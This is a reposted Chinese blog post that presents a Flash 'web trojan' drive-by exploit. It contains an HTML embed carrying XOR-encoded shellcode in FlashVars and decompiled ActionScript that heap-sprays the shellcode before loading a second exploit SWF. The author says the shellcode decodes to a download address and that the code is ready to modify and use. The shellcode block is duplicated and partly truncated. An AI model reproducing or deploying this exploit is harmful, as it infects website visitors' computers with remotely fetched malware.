码迷,mamicode.com
首页 > 其他好文 > 详细

flash 0day天窗网马最新0day -中国寒龙

时间:2014-12-19 00:29:16      阅读:296      评论:0      收藏:0      [点我收藏+]

标签:http   ar   io   color   使用   sp   for   on   bs   

以下是引用片段:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"

codebase="[url=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=1

0,0,0,0]

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0[/url]"

width="550" height="400" id="sdfasdf" align="middle">
<param name="allowScriptAccess" value="sameDomain" />
<param name="allowFullScreen" value="false" />
<param name="movie" value="nb.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="FlashVars" value="sc=%25u9090%25u9090%25u5858%25u5858%25u10EB%25u4B5B%25uC933%

25uB966%25u03B8%25u3480%25uBD0B%25uFAE2%25u05EB%25uEBE8%25uFFFF%25u54FF%25uBEA3%25uBDBD%

25uD9E2%25u8D1C%25uBDBD%25u36BD%25uB1FD%25uCD36%25u10A1%25uD536%25u36B5%25uD74A%25uE4AC%

25u0355%25uBDBF%25u2DBD%25u455F%25u8ED5%25uBD8F%25uD5BD%25uCEE8%25uCFD8%25u36E9%25uB1FB%

25u0355%25uBDBC%25u36BD%25uD755%25uE4B8%25u2355%25uBDBF%25u5FBD%25uD544%25uD3D2%25uBDBD%

25uC8D5%25uD1CF%25uE9D0%25uAB42%25u7D38%25uAEC8%25uD2D5%25uBDD3%25uD5BD%25uCFC8%25uD0D1%

25u36E9%25uB1FB%25u3355%25uBDBC%25u36BD%25uD755%25uE4BC%25uD355%25uBDBF%25u5FBD%25uD544%

25u8ED1%25uBD8F%25uCED5%25uD8D5%25uE9D1%25uFB36%25u55B1%25uBCD2%25uBDBD%25u5536%25uBCD7%

25u55E4%25uBFF2%25uBDBD%25u445F%25u513C%25uBCBD%25uBDBD%25u6136%25u7E3C%25uBD3D%25uBDBD%

25uBDD7%25uA7D7%25uD7EE%25u42BD%25uE1EB%25u7D8E%25u3DFD%25uBE81%25uC8BD%25u7A44%25uBEB9%

25uDCE1%25uD893%25uF97A%25uB9BE%25uD8C5%25uBDBD%25u748E%25uECEC%25uEAEE%25u8EEC%25u367D%

25uE5FB%25u9F55%25uBDBC%25u3EBD%25uBD45%25u1E54%25uBDBD%25u2DBD%25uBDD7%25uBDD7%25uBED7%

25uBDD7%25uBFD7%25uBDD5%25uBDBD%25uEE7D%25uFB36%25u5599%25uBCBC%25uBDBD%25uFB34%25uD7DD%

25uEDBD%25uEB42%25u3495%25uD9FB%25uFB36%25uD7DD%25uD7BD%25uD7BD%25uD7BD%25uD7B9%25uEDBD%

25uEB42%25uD791%25uD7BD%25uD7BD%25uD5BD%25uBDA2%25uBDB2%25u42ED%25u81EB%25uFB34%25u36C5%

25uD9F3%25uC13D%25u42B5%25uC909%25u3DB1%25uB5C1%25uBD42%25uB8C9%25uC93D%25u42B5%25u5F09%

25u3456%25u3D3B%25uBDBD%25u7ABD%25uCDFB%25uBDBD%25uBDBD%25uFB7A%25uBDC9%25uBDBD%25uD7BD%

25uD7BD%25uD7BD%25u36BD%25uDDFB%25u42ED%25u85EB%25u3B36%25uBD3D%25uBDBD%25uBDD7%25uF330%

25uECC9%25uCB42%25uEDCD%25uCB42%25u42DD%25u8DEB%25uCB42%25u42DD%25u89EB%25uCB42%25u42C5%

25uFDEB%25u4636%25u7D8E%25u668E%25u513C%25uBFBD%25uBDBD%25u7136%25u453E%25uC0E9%25u34B5%

25uBCA1%25u7D3E%25u56B9%25u364E%25u3671%25u3E64%25uAD7E%25u7D8E%25uECED%25uEDEE%25uEDED%

25uEDED%25uEAED%25uEDED%25uEB42%25u36B5%25uE9C3%25uAD55%25uBDBC%25u55BD%25uBDD8%25uBDBD%

25uDED5%25uCACB%25uD5BD%25uD5CE%25uD2D9%25u36E9%25uB1FB%25u9955%25uBDBD%25u34BD%25u81FB%

25u1CD9%25uBDB9%25uBDBD%25u1D30%25u42DD%25u4242%25uD8D7%25uCB42%25u3681%25uADFB%25uB555%

25uBDBD%25u8EBD%25uEE66%25uEEEE%25u42EE%25u3D6D%25u5585%25u853D%25uC854%25u3CAC%25uB8C5%

25u2D2D%25u2D2D%25uB5C9%25u4236%25u36E8%25u3051%25uB8FD%25u5D42%25u1B55%25uBDBD%25u7EBD%

25u1D55%25uBDBD%25u05BD%25uBCAC%25u3DB9%25uB17F%25u55BD%25uBD2E%25uBDBD%25u513C%25uBCBD%

25uBDBD%25u4136%25u7A3E%25u7AB9%25u8FBA%25u2CC9%25u7AB1%25uB9FA%25u34DE%25uF26C%25uFA7A%

25u1DB5%25u2AD8%25u7A76%25uB1FA%25uFDEC%25uC207%25uFA7A%25u83AD%25u0BA0%25u7A84%25uA9FA%

25uD405%25uA669%25uFA7A%25u03A5%25uDBC2%25u7A1D%25uA1FA%25u1441%25u108A%25uFA7A%25u259D%

25uADB7%25uD945%25u8D1C%25uBDBD%25u36BD%25uB1FD%25uCD36%25u10A1%25uD536%25u36B5%25uD74A%

25uE4B9%25uE955%25uBDBD%25u2DBD%25u455F%25u8ED5%25uBD8F%25uD5BD%25uCEE8%25uCFD8%25u36E9%

25u55BB%25u42E8%25u4242%25u5536%25uB8D7%25u55E4%25uBD88%25uBDBD%25u445F%25u428E%25u42EA%

25uB9EB%25uBF56%25u7EE5%25u4455%25u4242%25uE642%25uBA7B%25u3405%25uBCE2%25u7ADB%25uB8FA%

25u5D42%25uEE7E%25u6136%25uD7EE%25uD5FD%25uADBD%25uBDBD%25u36EA%25u9DFB%25uA555%25u4242%

25uE542%25uEC7E%25u36EB%25u81C8%25uC936%25uC593%25u48BE%25u36EB%25u9DCB%25u48BE%25u748E%

25uFCF4%25uBE10%25u8E78%25uB266%25uAD03%25u6B87%25uB5C9%25u767C%25uBEBA%25uFD67%25u4C56%

25uA286%25u5AC8%25u36E3%25u99E3%25u60BE%25u36DB%25uF6B1%25uE336%25uBEA1%25u3660%25u36B9%

25u78BE%25uE316%25u7EE4%25u6055%25u4241%25u0F42%25u5F4F%25u8449%25uC05F%25u673E%25uC6F5%

25u8F80%25u2CC9%25u38B1%25u1262%25uDE06%25u6C34%25uECF2%25u07FD%25u1DC2%25u2AD8%25uA376%

25uD919%25u2E52%25u598F%25u3329%25uB7AE%25u7F11%25uF6A4%25u79BC%25uA230%25uEAC9%25uB0DB%

25uFE42%25u1103%25uC066%25u184D%25uEF27%25u1A43%25u8367%25u0BA0%25u0584%25u69D4%25u03A6%

25uDBC2%25u411D%25u8A14%25u2510%25uADB7%25u3D45%25u126B%25u4627%25uA8EE%25ud5db%25uc9c9%

25u87cd%25u9292%25uce8f%25udbde%25ude93%25ud0d2%25u8587%25u858d%25uce92%25ucfd8%25ud8cb%

25u93cf%25uc5d8%25ubdd8">

uBD0B%25uFAE2%25u05EB%25uEBE8%25uFFFF%25u54FF%25uBEA3%25uBDBD%25uD9E2%25u8D1C%25uBDBD%

25u36BD%25uB1FD%25uCD36%25u10A1%25uD536%25u36B5%25uD74A%25uE4AC%25u0355%25uBDBF%25u2DBD%

25u455F%25u8ED5%25uBD8F%25uD5BD%25uCEE8%25uCFD8%25u36E9%25uB1FB%25u0355%25uBDBC%25u36BD%

25uD755%25uE4B8%25u2355%25uBDBF%25u5FBD%25uD544%25uD3D2%25uBDBD%25uC8D5%25uD1CF%25uE9D0%

25uAB42%25u7D38%25uAEC8%25uD2D5%25uBDD3%25uD5BD%25uCFC8%25uD0D1%25u36E9%25uB1FB%25u3355%

25uBDBC%25u36BD%25uD755%25uE4BC%25uD355%25uBDBF%25u5FBD%25uD544%25u8ED1%25uBD8F%25uCED5%

25uD8D5%25uE9D1%25uFB36%25u55B1%25uBCD2%25uBDBD%25u5536%25uBCD7%25u55E4%25uBFF2%25uBDBD%

25u445F%25u513C%25uBCBD%25uBDBD%25u6136%25u7E3C%25uBD3D%25uBDBD%25uBDD7%25uA7D7%25uD7EE%

25u42BD%25uE1EB%25u7D8E%25u3DFD%25uBE81%25uC8BD%25u7A44%25uBEB9%25uDCE1%25uD893%25uF97A%

25uB9BE%25uD8C5%25uBDBD%25u748E%25uECEC%25uEAEE%25u8EEC%25u367D%25uE5FB%25u9F55%25uBDBC%

25u3EBD%25uBD45%25u1E54%25uBDBD%25u2DBD%25uBDD7%25uBDD7%25uBED7%25uBDD7%25uBFD7%25uBDD5%

25uBDBD%25uEE7D%25uFB36%25u5599%25uBCBC%25uBDBD%25uFB34%25uD7DD%25uEDBD%25uEB42%25u3495%

25uD9FB%25uFB36%25uD7DD%25uD7BD%25uD7BD%25uD7BD%25uD7B9%25uEDBD%25uEB42%25uD791%25uD7BD%

25uD7BD%25uD5BD%25uBDA2%25uBDB2%25u42ED%25u81EB%25uFB34%25u36C5%25uD9F3%25uC13D%25u42B5%

25uC909%25u3DB1%25uB5C1%25uBD42%25uB8C9%25uC93D%25u42B5%25u5F09%25u3456%25u3D3B%25uBDBD%

25u7ABD%25uCDFB%25uBDBD%25uBDBD%25uFB7A%25uBDC9%25uBDBD%25uD7BD%25uD7BD%25uD7BD%25u36BD%

25uDDFB%25u42ED%25u85EB%25u3B36%25uBD3D%25uBDBD%25uBDD7%25uF330%25uECC9%25uCB42%25uEDCD%

25uCB42%25u42DD%25u8DEB%25uCB42%25u42DD%25u89EB%25uCB42%25u42C5%25uFDEB%25u4636%25u7D8E%

25u668E%25u513C%25uBFBD%25uBDBD%25u7136%25u453E%25uC0E9%25u34B5%25uBCA1%25u7D3E%25u56B9%

25u364E%25u3671%25u3E64%25uAD7E%25u7D8E%25uECED%25uEDEE%25uEDED%25uEDED%25uEAED%25uEDED%

25uEB42%25u36B5%25uE9C3%25uAD55%25uBDBC%25u55BD%25uBDD8%25uBDBD%25uDED5%25uCACB%25uD5BD%

25uD5CE%25uD2D9%25u36E9%25uB1FB%25u9955%25uBDBD%25u34BD%25u81FB%25u1CD9%25uBDB9%25uBDBD%

25u1D30%25u42DD%25u4242%25uD8D7%25uCB42%25u3681%25uADFB%25uB555%25uBDBD%25u8EBD%25uEE66%

25uEEEE%25u42EE%25u3D6D%25u5585%25u853D%25uC854%25u3CAC%25uB8C5%25u2D2D%25u2D2D%25uB5C9%

25u4236%25u36E8%25u3051%25uB8FD%25u5D42%25u1B55%25uBDBD%25u7EBD%25u1D55%25uBDBD%25u05BD%

25uBCAC%25u3DB9%25uB17F%25u55BD%25uBD2E%25uBDBD%25u513C%25uBCBD%25uBDBD%25u4136%25u7A3E%

25u7AB9%25u8FBA%25u2CC9%25u7AB1%25uB9FA%25u34DE%25uF26C%25uFA7A%25u1DB5%25u2AD8%25u7A76%

25uB1FA%25uFDEC%25uC207%25uFA7A%25u83AD%25u0BA0%25u7A84%25uA9FA%25uD405%25uA669%25uFA7A%

25u03A5%25uDBC2%25u7A1D%25uA1FA%25u1441%25u108A%25uFA7A%25u259D%25uADB7%25uD945%25u8D1C%

25uBDBD%25u36BD%25uB1FD%25uCD36%25u10A1%25uD536%25u36B5%25uD74A%25uE4B9%25uE955%25uBDBD%

25u2DBD%25u455F%25u8ED5%25uBD8F%25uD5BD%25uCEE8%25uCFD8%25u36E9%25u55BB%25u42E8%25u4242%

25u5536%25uB8D7%25u55E4%25uBD88%25uBDBD%25u445F%25u428E%25u42EA%25uB9EB%25uBF56%25u7EE5%

25u4455%25u4242%25uE642%25uBA7B%25u3405%25uBCE2%25u7ADB%25uB8FA%25u5D42%25uEE7E%25u6136%

25uD7EE%25uD5FD%25uADBD%25uBDBD%25u36EA%25u9DFB%25uA555%25u4242%25uE542%25uEC7E%25u36EB%

25u81C8%25uC936%25uC593%25u48BE%25u36EB%25u9DCB%25u48BE%25u748E%25uFCF4%25uBE10%25u8E78%

25uB266%25uAD03%25u6B87%25uB5C9%25u767C%25uBEBA%25uFD67%25u4C56%25uA286%25u5AC8%25u36E3%

25u99E3%25u60BE%25u36DB%25uF6B1%25uE336%25uBEA1%25u3660%25u36B9%25u78BE%25uE316%25u7EE4%

25u6055%25u4241%25u0F42%25u5F4F%25u8449%25uC05F%25u673E%25uC6F5%25u8F80%25u2CC9%25u38B1%

25u1262%25uDE06%25u6C34%25uECF2%25u07FD%25u1DC2%25u2AD8%25uA376%25uD919%25u2E52%25u598F%

25u3329%25uB7AE%25u7F11%25uF6A4%25u79BC%25uA230%25uEAC9%25uB0DB%25uFE42%25u1103%25uC066%

25u184D%25uEF27%25u1A43%25u8367%25u0BA0%25u0584%25u69D4%25u03A6%25uDBC2%25u411D%25u8A14%

25u2510%25uADB7%25u3D45%25u126B%25u4627%25uA8EE%25ud5db%25uc9c9%25u87cd%25u9292%25uce8f%

25udbde%25ude93%25ud0d2%25u8587%25u858d%25uce92%25ucfd8%25ud8cb%25u93cf%25uc5d8%25ubdd8"

quality="high" bgcolor="#ffffff" width="550" height="400" name="sdfasdf" align="middle"

allowScriptAccess="sameDomain" allowFullScreen="false" type="application/x-shockwave-flash"

pluginspage="http://www.adobe.com/go/getflashplayer_cn"  /></object>


    shellcode部分是经过异或后的,密匙是bd.丢到FreShow,填上密匙解码2次就出来地址了,nb.swf是用

硕思逆出来的代码是

nb.swf 逆向代码:

package sdfasdf_fla
{
    import flash.display.*;
    import flash.events.*;
    import flash.net.*;
    import flash.utils.*;
 
    dynamic public class MainTimeline extends MovieClip
    {
        public var a:String;
        public var i:Object;
        public var b:String;
        public var loader:Loader;
        public var t:String;
        public var len:Object;
        public var ul:URLLoader;
        public var array:Array;
 
        public function MainTimeline()
        {
            addFrameScript(0, this.frame1);
            return;
        }// end function

        function frame1()
        {
            this.a = unescape("%u0d0d%u0d0d");
            this.t = this.a;
            this.b = unescape(stage.loaderInfo.parameters.sc);
            this.len = 1048576 - this.b.length - 256;
            while (this.a.length < this.len)
            {
                
                this.a = this.a + this.t;
            }
            this.a = this.a + this.b;
            this.array = new Array();
            this.i = 0;
            while (this.i < 200)
            {
                
                this.array[this.i] = new ByteArray();
                this.array[this.i].writeMultiByte(this.a, "unicode");
                var _loc_1:String;
                _loc_1.i = this.i++;
            }
            this.ul = new URLLoader();
            this.ul.dataFormat = URLLoaderDataFormat.BINARY;
            this.ul.addEventListener(Event.COMPLETE, this.onComplete);
            this.ul.load(new URLRequest("encoded.swf"));
            this.loader = new Loader();
            addChild(this.loader);
            trace("xxxxxxxxxxxxxxxxx");
            return;
        }// end function
 
        public function onComplete(param1:Event) : void
        {
            var _loc_2:* = (param1.target as URLLoader).data;
            _loc_2.uncompress();
            this.loader.loadBytes(_loc_2);
            return;
        }// end function

    }
}


    解开后会发现还有一个encoded.swf,也需要下载回来,不过这个swf是经过处理过的!硕思逆不开,不过

现在这样已经可以正常修改使用了!

flash 0day天窗网马最新0day -中国寒龙

标签:http   ar   io   color   使用   sp   for   on   bs   

原文地址:http://www.cnblogs.com/Hkadmin/p/4172984.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!